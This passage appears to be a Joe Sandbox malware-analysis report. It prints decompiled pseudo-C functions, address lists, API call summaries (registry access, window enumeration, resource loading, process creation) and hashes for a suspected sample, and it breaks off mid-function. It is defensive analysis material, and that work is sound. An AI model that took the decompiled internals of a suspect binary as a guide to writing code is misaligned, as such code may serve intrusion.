                  0x004486b7
                  0x004486b9
                  0x004486bb
                  0x004486da
                  0x004486da
                  0x004486dd
                  0x004486df
                  0x004486e6
                  0x004486e9
                  0x00448700
                  0x00448703
                  0x0044870f
                  0x00448719
                  0x00448731
                  0x00448739
                  0x0044873b
                  0x0044873c
                  0x004487ec
                  0x004487f9
                  0x004487fd
                  0x00448803
                  0x00448806
                  0x00448808
                  0x00000000
                  0x00000000
                  0x00448744
                  0x00448747
                  0x00448810
                  0x00448813
                  0x00000000
                  0x00448815
                  0x0044881b
                  0x00448822
                  0x00448824
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00448824
                  0x0044874d
                  0x00448763
                  0x00448763
                  0x00448765
                  0x00448791
                  0x00448791
                  0x00448794
                  0x00448798
                  0x0044879b
                  0x0044883c
                  0x0044883c
                  0x004487a1
                  0x004487a1
                  0x004487a3
                  0x004487b7
                  0x004487cd
                  0x004487de
                  0x004487e6
                  0x004487ea
                  0x004487ea
                  0x00000000
                  0x004487a5
                  0x004487a5
                  0x004487a9
                  0x00000000
                  0x004487ab
                  0x004487b2
                  0x00000000
                  0x004487b2
                  0x004487a9
                  0x004487a3
                  0x00448767
                  0x00448775
                  0x0044877a
                  0x0044877d
                  0x0044877e
                  0x00448780
                  0x00448781
                  0x00448786
                  0x00448789
                  0x0044878b
                  0x00448826
                  0x00448826
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0044878b
                  0x00448765
                  0x00448830
                  0x00000000
                  0x00448835
                  0x00000000
                  0x004486eb
                  0x004486ed
                  0x004486f4
                  0x004486f6
                  0x00000000
                  0x004486f8
                  0x00000000
                  0x004486f8
                  0x004486f6
                  0x004486e1
                  0x004486e1
                  0x004486e1
                  0x004486bd
                  0x004486bd
                  0x004486c2
                  0x004486c4
                  0x004486c6
                  0x00000000
                  0x004486c8
                  0x004486c8
                  0x004486c8
                  0x004486ca
                  0x004486cd
                  0x004486d2
                  0x004486d4
                  0x004486d6
                  0x004486d6
                  0x004486c6
                  0x004486a8
                  0x004486a8
                  0x004486aa
                  0x004486af

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Fputc$H_prolog3_
                  • String ID:
                  • API String ID: 2569218679-3916222277
                  • Opcode ID: 237c212654eced7c93fdea10f5d81e29309294a7abb01743d3939285b13505b4
                  • Instruction ID: 43a9223603d8fbf2c2dcb423a63fa1aa8cc96a8be0706671927d04f470b5847f
                  • Opcode Fuzzy Hash: 237c212654eced7c93fdea10f5d81e29309294a7abb01743d3939285b13505b4
                  • Instruction Fuzzy Hash: 9251F532D046049FEF14EBA5CC819EEB3B6AF48314F24451FE102A7281EF38A805CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02311CC2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311CF2
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D12
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D
                  • API String ID: 2922976086-2746444292
                  • Opcode ID: b5c36caf711e3752c47cd49f31f1c9c67ed657577fb943b044154ee70cc707a3
                  • Instruction ID: 63fa81e7e5cd08aff09f596ed4f105b445deadc394d2815a49ec7bea7fb35380
                  • Opcode Fuzzy Hash: b5c36caf711e3752c47cd49f31f1c9c67ed657577fb943b044154ee70cc707a3
                  • Instruction Fuzzy Hash: F7F0C272900008ABDB29DEA5DC089FFB7BDEF45311F11442AEA1AE6100EBB19908C6A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426700, Relevance: 6.1, APIs: 4, Instructions: 112registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00426700(void* __ecx, intOrPtr _a4, CHAR* _a8, char* _a12, long _a16) {
				int* _v8;
				char _v16;
				signed int _v20;
				char _v4116;
				char _v4120;
				intOrPtr _v4124;
				CHAR* _v4128;
				int _v4132;
				long _v4136;
				void* _v4140;
				int _v4144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				signed int _t46;
				CHAR* _t48;
				intOrPtr _t52;
				void* _t54;
				long _t58;
				char* _t69;
				intOrPtr _t70;
				intOrPtr _t79;
				long _t85;
				intOrPtr _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t92;
				signed int _t93;

				_t71 = __ecx;
				_push(0xffffffff);
				_push(E0044C291);
				_push( *[fs:0x0]);
				E004348C0(0x1020);
				_t45 =  *0x463404; // 0x38a11573
				_t46 = _t45 ^ _t93;
				_v20 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_t87 = _a4;
				_t85 = _a16;
				_t48 = _a8;
				_t69 = _a12;
				_v4124 = _t87;
				_v4128 = _t85;
				_v4136 = 0;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					__eflags = _t85;
					if(__eflags == 0) {
						_v4128 = 0x44f0f5;
					}
					GetPrivateProfileStringA(_t48, _t69, _v4128,  &_v4116, 0x1000,  *(_t71 + 0x68)); // executed
					_push( &_v4116);
					goto L12;
				} else {
					_t54 = E0042652C(__ecx, _t48);
					_v4140 = _t54;
					_t95 = _t54;
					if(_t54 != 0) {
						E004014C0( &_v4120, _t85);
						_t89 = RegQueryValueExA;
						_v8 = 0;
						_v4144 = 0;
						_v4132 = 0;
						_t58 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, 0,  &_v4132);
						_v4136 = _t58;
						__eflags = _t58;
						if(_t58 == 0) {
							_v4136 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, E004014F0( &_v4120, _v4132),  &_v4132);
							E0040A356( &_v4120, 0xffffffff);
						}
						RegCloseKey(_v4140);
						_t79 = _v4124;
						__eflags = _v4136;
						if(__eflags != 0) {
							_push(_v4128);
							E00406039(_t69, _t79, _t85, _t89, 0, __eflags);
						} else {
							E00405562(_t79, __eflags,  &_v4120);
						}
						E004010B0(_v4120 + 0xfffffff0, _t85);
						_t52 = _v4124;
					} else {
						_push(_v4128);
						L12:
						E00406039(_t69, _t87, _t85, _t87, 0, _t95);
						_t52 = _t87;
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t88);
				_pop(_t92);
				_pop(_t70);
				return E00430650(_t52, _t70, _v20 ^ _t93, _t85, _t88, _t92);
			}

































                  0x00426700
                  0x00426705
                  0x00426707
                  0x00426712
                  0x00426718
                  0x0042671d
                  0x00426722
                  0x00426724
                  0x0042672a
                  0x0042672e
                  0x00426734
                  0x00426737
                  0x0042673a
                  0x0042673d
                  0x00426742
                  0x00426748
                  0x0042674e
                  0x00426757
                  0x00426841
                  0x00426843
                  0x00426845
                  0x00426845
                  0x00426866
                  0x00426872
                  0x00000000
                  0x0042675d
                  0x0042675e
                  0x00426763
                  0x00426769
                  0x0042676b
                  0x0042677e
                  0x00426783
                  0x004267a0
                  0x004267a3
                  0x004267a9
                  0x004267af
                  0x004267b1
                  0x004267b7
                  0x004267b9
                  0x004267ed
                  0x004267f3
                  0x004267f3
                  0x004267fe
                  0x00426804
                  0x0042680a
                  0x00426810
                  0x00426834
                  0x0042683a
                  0x00426812
                  0x00426819
                  0x00426819
                  0x00426827
                  0x0042682c
                  0x0042676d
                  0x0042676d
                  0x00426873
                  0x00426875
                  0x0042687a
                  0x0042687a
                  0x0042676b
                  0x0042687f
                  0x00426887
                  0x00426888
                  0x00426889
                  0x00426895

                  APIs
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,38A11573,?,?,?,?,0044C291,000000FF), ref: 004267AF
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,0044C291,000000FF), ref: 004267E3
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,0044C291,000000FF), ref: 004267FE
                  • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 00426866
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: QueryValue$ClosePrivateProfileString
                  • String ID:
                  • API String ID: 1042844925-0
                  • Opcode ID: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction ID: d787f72a76d7a1e81abdc91ab3fdba828746559dca16c0f286bccc120076d8c8
                  • Opcode Fuzzy Hash: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction Fuzzy Hash: C2416A75D001A8ABDB31DF55DC449EEB7B8EB48354F0041EAF189A2290C7B89EC5DF68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F918, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E0040F918(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E0040EE68(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20); // executed
							E0040F62D(_t22, _t24, _t25, __eflags); // executed
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E0040F918(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24); // executed
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                  0x0040f918
                  0x0040f918
                  0x0040f922
                  0x0040f928
                  0x0040f98b
                  0x0040f98b
                  0x0040f98f
                  0x00000000
                  0x00000000
                  0x0040f92c
                  0x0040f930
                  0x0040f95a
                  0x0040f932
                  0x0040f933
                  0x0040f938
                  0x0040f93a
                  0x0040f93c
                  0x0040f93f
                  0x0040f942
                  0x0040f945
                  0x0040f948
                  0x0040f949
                  0x0040f949
                  0x0040f93a
                  0x0040f960
                  0x0040f964
                  0x0040f967
                  0x0040f969
                  0x0040f96b
                  0x0040f97d
                  0x0040f97d
                  0x0040f96b
                  0x0040f985
                  0x0040f985
                  0x0040f994

                  APIs
                  • GetTopWindow.USER32(?), ref: 0040F928
                  • GetTopWindow.USER32(00000000), ref: 0040F967
                  • GetWindow.USER32(00000000,00000002), ref: 0040F985
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window
                  • String ID:
                  • API String ID: 2353593579-0
                  • Opcode ID: 634e316a57366a6b5d692cc382059a7dd18669e77a7b49c22c6d5c96a702ac6b
                  • Instruction ID: b27234d353631adc336677cf3729c0b56e1793a16e94a8337e953a23c5fb5991
                  • Opcode Fuzzy Hash: 634e316a57366a6b5d692cc382059a7dd18669e77a7b49c22c6d5c96a702ac6b
                  • Instruction Fuzzy Hash: 2F01D77600151ABBCF226F969C04F9F3A26BF49351F454436FA10615A0C73ACA26EFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00427206, Relevance: 6.0, APIs: 4, Instructions: 48registrystringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00427206(void* __esi, void* _a4, CHAR* _a8, char* _a12) {
				void* __ebp;
				long _t13;
				long _t14;
				long _t17;
				long _t18;
				signed int _t20;
				void* _t23;
				void* _t24;
				void* _t25;
				long _t28;

				_t29 = _a12;
				if(_a12 != 0) {
					_push(__esi);
					_push( &_a4);
					_push(_a4);
					_push(0x80000000); // executed
					_t13 = E0041FF90(_t23, _t24, _t25, __esi, __eflags); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L6:
						_t14 = 0;
						__eflags = 0;
						L7:
						return _t14;
					}
					_t17 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1); // executed
					_t28 = _t17;
					_t18 = RegCloseKey(_a4);
					__eflags = _t18;
					if(_t18 != 0) {
						goto L6;
					}
					__eflags = _t28;
					if(_t28 != 0) {
						goto L6;
					}
					_t14 = _t18 + 1;
					goto L7;
				}
				_push(lstrlenA(_a8));
				_push(_a8);
				_push(1);
				_push(_a4);
				_push(0x80000000); // executed
				_t20 = E004200A3(_t23, _t24, _t25, __esi, _t29); // executed
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}













                  0x0042720b
                  0x0042720f
                  0x00427234
                  0x00427238
                  0x00427239
                  0x0042723c
                  0x00427241
                  0x00427246
                  0x00427248
                  0x0042727e
                  0x0042727e
                  0x0042727e
                  0x00427280
                  0x00000000
                  0x00427280
                  0x00427262
                  0x0042726b
                  0x0042726d
                  0x00427273
                  0x00427275
                  0x00000000
                  0x00000000
                  0x00427277
                  0x00427279
                  0x00000000
                  0x00000000
                  0x0042727b
                  0x00000000
                  0x0042727b
                  0x0042721a
                  0x0042721b
                  0x0042721e
                  0x00427220
                  0x00427223
                  0x00427228
                  0x0042722f
                  0x00000000

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 004200A3: __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 004200A3: RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                  • lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                  • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                  • RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Valuelstrlen$CloseH_prolog3
                  • String ID:
                  • API String ID: 3141881944-0
                  • Opcode ID: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction ID: ccfb3bf29ba8f107e27247e9e6faae6128845c626efc22bed24505a1ddd35dde
                  • Opcode Fuzzy Hash: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction Fuzzy Hash: BE018F36604228FFEF111FA1EC04FEA3B69FB04754F508465FE19D9060D77589619BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00417E26, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E00417E26(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				struct HINSTANCE__* _t23;

				_t18 = __edx;
				_push(__ecx);
				_push(_t22);
				_push(_t19);
				_v8 = __ecx;
				_t14 = 0;
				_t23 =  *(E0041F363(0, _t19, _t22, __eflags) + 0xc);
				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
				_t27 = _t20;
				if(_t20 != 0) {
					_t14 = LockResource(_t20);
				}
				_t9 = E00417A77(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23); // executed
				FreeResource(_t20);
				return _t9;
			}















                  0x00417e26
                  0x00417e2b
                  0x00417e2d
                  0x00417e2e
                  0x00417e2f
                  0x00417e32
                  0x00417e39
                  0x00417e50
                  0x00417e52
                  0x00417e54
                  0x00417e5d
                  0x00417e5d
                  0x00417e67
                  0x00417e6f
                  0x00417e7b

                  APIs
                  • FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                  • LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                  • LockResource.KERNEL32(00000000), ref: 00417E57
                  • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction ID: 1e18d01870298c609716ab9c137838f91a6cabb118689048c7d05f5a7d7d13e7
                  • Opcode Fuzzy Hash: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction Fuzzy Hash: D1F0543B500214BBC7025FE79C48D9FBBBDEF86661B01406AFA0593251DA74DD0187A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041EB0A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E0041EB0A(intOrPtr __ebx, void* __ecx, intOrPtr __edx) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v532;
				struct HINSTANCE__* _v536;
				intOrPtr _v544;
				WCHAR* _v556;
				intOrPtr _v560;
				char _v564;
				void* __edi;
				void* __esi;
				signed int _t25;
				intOrPtr _t36;
				intOrPtr _t40;
				struct HINSTANCE__* _t42;
				intOrPtr _t43;
				void* _t45;
				intOrPtr _t46;
				signed int _t50;

				_t40 = __edx;
				_t36 = __ebx;
				_t48 = _t50;
				_t25 =  *0x463404; // 0x38a11573
				_v8 = _t25 ^ _t50;
				_t45 = __ecx;
				E0041EA0E(__ecx);
				_t42 =  *(__ecx + 8);
				_v10 = 0;
				_v12 = 0;
				if(GetModuleFileNameW(_t42,  &_v532, 0x105) != 0) {
					if(_v12 == 0) {
						_v556 =  &_v532;
						_push( &_v564);
						_v564 = 0x20;
						_v560 = 0x88;
						_v544 = 2;
						_v536 = _t42;
						_t30 = E0041EA7C(); // executed
						 *(_t45 + 0x80) = _t30;
						if(_t30 == 0xffffffff) {
							_push( &_v564);
							_v544 = 3;
							_t30 = E0041EA7C(); // executed
							 *(_t45 + 0x80) = _t30;
						}
						if( *(_t45 + 0x80) == 0xffffffff) {
							_push( &_v564);
							_v544 = 1;
							_t30 = E0041EA7C(); // executed
							 *(_t45 + 0x80) = _t30;
							if(_t30 == 0xffffffff) {
								 *(_t45 + 0x80) =  *(_t45 + 0x80) & 0x00000000;
							}
						}
					} else {
						SetLastError(0x6f);
					}
				}
				_pop(_t43);
				_pop(_t46);
				return E00430650(_t30, _t36, _v8 ^ _t48, _t40, _t43, _t46);
			}






















                  0x0041eb0a
                  0x0041eb0a
                  0x0041eb0d
                  0x0041eb15
                  0x0041eb1c
                  0x0041eb21
                  0x0041eb23
                  0x0041eb28
                  0x0041eb2d
                  0x0041eb31
                  0x0041eb4a
                  0x0041eb55
                  0x0041eb6a
                  0x0041eb76
                  0x0041eb77
                  0x0041eb81
                  0x0041eb8b
                  0x0041eb95
                  0x0041eb9b
                  0x0041eba0
                  0x0041eba9
                  0x0041ebb1
                  0x0041ebb2
                  0x0041ebbc
                  0x0041ebc1
                  0x0041ebc1
                  0x0041ebce
                  0x0041ebd6
                  0x0041ebd7
                  0x0041ebe1
                  0x0041ebe6
                  0x0041ebef
                  0x0041ebf1
                  0x0041ebf1
                  0x0041ebef
                  0x0041eb57
                  0x0041eb59
                  0x0041eb59
                  0x0041eb55
                  0x0041ebfb
                  0x0041ebfe
                  0x0041ec05

                  APIs
                    • Part of subcall function 0041EA0E: GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                  • SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                  • String ID:
                  • API String ID: 2524245154-3916222277
                  • Opcode ID: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction ID: 2d8284ff9693ed2a28cfc80b954e748d0848247ed859874abad0443c4c525062
                  • Opcode Fuzzy Hash: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction Fuzzy Hash: 252180749002289EDB20DF76C8487EEB7B4BF18324F10469ED469D3280DB789A85DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420AEC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00420AEC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr _t33;

				_t27 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_push(4);
				E00431A9B(E0044BF03, __ebx, __edi, __esi);
				_t30 = __ecx;
				_t33 =  *((intOrPtr*)(_t31 + 8));
				_t34 = _t33 == 0;
				if(_t33 == 0) {
					L1:
					E00406436(_t22, _t23, _t27, _t30, _t34);
				}
				if( *_t30 == 0) {
					_t23 =  *0x466564; // 0x466568
					if(_t23 != 0) {
						L5:
						_t19 = E004206EA(_t23); // executed
						 *_t30 = _t19;
						if(_t19 == 0) {
							goto L1;
						}
					} else {
						 *((intOrPtr*)(_t31 - 0x10)) = 0x466568;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t21 = E00420802(0x466568);
						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
						_t23 = _t21;
						 *0x466564 = _t21;
						if(_t21 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t24 =  *0x466564; // 0x466568
				_t28 = E0042055C(_t24,  *_t30);
				_t39 = _t28;
				if(_t28 == 0) {
					_t17 =  *((intOrPtr*)(_t31 + 8))();
					_t25 =  *0x466564; // 0x466568
					E004208A9(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
				}
				return E00431B73(_t28);
			}











                  0x00420aec
                  0x00420aec
                  0x00420aec
                  0x00420aec
                  0x00420af3
                  0x00420af8
                  0x00420afc
                  0x00420b02
                  0x00420b04
                  0x00420b06
                  0x00420b06
                  0x00420b06
                  0x00420b0e
                  0x00420b10
                  0x00420b18
                  0x00420b3b
                  0x00420b3b
                  0x00420b40
                  0x00420b44
                  0x00000000
                  0x00000000
                  0x00420b1a
                  0x00420b1f
                  0x00420b22
                  0x00420b26
                  0x00420b2b
                  0x00420b2f
                  0x00420b31
                  0x00420b39
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420b39
                  0x00420b18
                  0x00420b48
                  0x00420b53
                  0x00420b55
                  0x00420b57
                  0x00420b59
                  0x00420b5c
                  0x00420b67
                  0x00420b67
                  0x00420b73

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8Throw
                  • String ID: heF$heF
                  • API String ID: 2489616738-1142830922
                  • Opcode ID: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction ID: ab974ef05ecb18432cb7f708e95ae9439a66807c8b60da0ae834fd07ff38b2a5
                  • Opcode Fuzzy Hash: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction Fuzzy Hash: 560152307002229BDB24EF75A86262A7AE29B40398F51403EE442C73A2EB78D841C75D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004200A3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E004200A3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				void* _t25;
				void* _t28;
				void* _t42;
				void* _t45;

				_t45 = __eflags;
				_t38 = __edx;
				_push(0);
				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
				_push( *(_t42 + 0xc));
				E00406039(__ebx, _t42 + 0xc, __edx, __edi, __esi, _t45);
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				if( *(_t42 + 8) == 0x80000000) {
					_t25 = E0041EC3D();
					_t47 = _t25 - 1;
					if(_t25 == 1) {
						_push(_t42 + 0xc);
						_push("Software\\Classes\\");
						_push(_t42 + 8);
						_t28 = E004168AB(__ebx, __edi, __esi, _t47);
						 *(_t42 - 4) = 1;
						E004056C2(__ebx, _t42 + 0xc, _t28);
						E004010B0( *(_t42 + 8) + 0xfffffff0, _t38);
						 *(_t42 + 8) = 0x80000001;
					}
				}
				_t21 = RegSetValueA( *(_t42 + 8),  *(_t42 + 0xc),  *(_t42 + 0x10),  *(_t42 + 0x14),  *(_t42 + 0x18)); // executed
